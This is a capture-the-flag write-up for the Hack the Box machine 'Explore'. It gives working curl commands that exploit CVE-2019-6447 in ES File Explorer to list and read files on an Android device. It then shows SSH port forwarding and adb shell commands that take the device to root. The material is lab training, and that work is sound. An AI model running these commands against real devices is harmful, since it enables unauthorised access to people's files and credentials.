CTF Competitions Write-ups GitBook About

Contents

Hack the Box - Explore

 included in write-ups
   407 words   2 minutes 
/explore/title.png
Write-up of Explore - Difficulty : Easy

1.Recon

rustscan -a $target --ulimit 5000

I’m lazy so we can start off by setting our target and running rustscan. As always don’t use rustscan on anything that you don’t to make a ton of noise on since it’s just nmap with no brakes

Ports open are 2222/34401/59777. Port 2222 we already know is SSH on Android. First thing that comes up when researching port 59777 is an exploit. I’m not sure if it was supposed to be that simple but we might as well take a look at it. The exploit references CVE-2019-6447.

The github for the exploit-db script shows us how to use the exploit without having to run the python script. The available commands can be found near the bottom and they can be run with a simple curl POST request.

2. Exploit

First thing we should do is get the device info and make sure everything is working properly.
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://$target:59777

We can then list the files of the /sdcard that was called out.
curl --header "Content-Type: application/json" --request POST --data '{"command":"listFiles"}' http://$target:59777/sdcard

Looks like user.txt is right in the sdcard root directory. We can probably just read that file without having to get user at all.
curl http://$target:59777/sdcard/user.txt

Next we’ll just have to some regular recon of what’s on the sdcard. After a bit of poking around we wind up at DCIM which has a few pictures on it.
curl --header "Content-Type: application/json" --request POST --data '{"command":"listFiles"}' http://$target:59777/sdcard/DCIM

Since we can’t view the images in a terminal window we’ll just have to use a web browser instead. Looks like someone took a picture of their login credentials so they wouldn’t forget them.

With these credentials we’re able to ssh into the box using port 2222. First thing we run is netstat to view what ports are listening.

3. Root

Android Debug Bridge is listening on local port 5555. Since we can’t access it directly we’ll have to use ssh port forwarding from our attack box. Then we can simply run adb connect and adb shell to get access to the debug command line. A simple su command and we have root access.

1
2
3
4

PortForward =   ssh -L 5555:localhost:5555 kristi@$target -p 2222
        ADB =   adb connect localhost:5555
                adb devices
                adb -s localhost:5555 shell

If this write-up was helpful consider leaving some respect on my HTB profile.
Updated on 2022-08-13
 ADBAndroidHTB
Back | Home